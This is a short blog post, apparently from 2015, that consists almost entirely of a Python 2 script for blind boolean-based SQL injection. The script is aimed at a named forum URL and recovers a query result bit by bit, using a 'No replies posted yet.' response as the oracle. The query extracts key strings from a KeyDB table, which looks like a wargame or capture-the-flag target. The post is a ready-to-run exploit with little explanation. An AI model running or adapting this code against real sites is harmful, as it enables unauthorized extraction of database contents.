2015. 10. 24. 16:20

#!/usr/bin/python


import urllib2,urllib,time

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0

answer = ""


while 1:

x +=1

ch = 0


for i in range(1,8):

url = "http://poworks.com/index.php/forum/?cid=0&show="

#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)

att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)

att = urllib.quote(att)

url += att

req = urllib2.Request(url)

result = urllib2.urlopen(req).read()

#print result

r = result.find("No replies posted yet.")

if r > -1:

ch += 2**(7-i)

else:

pass


if ch == 0:


break


else:


answer += chr(ch)


print ":) : "+ answer



print "END : ",answer



Posted by k1rha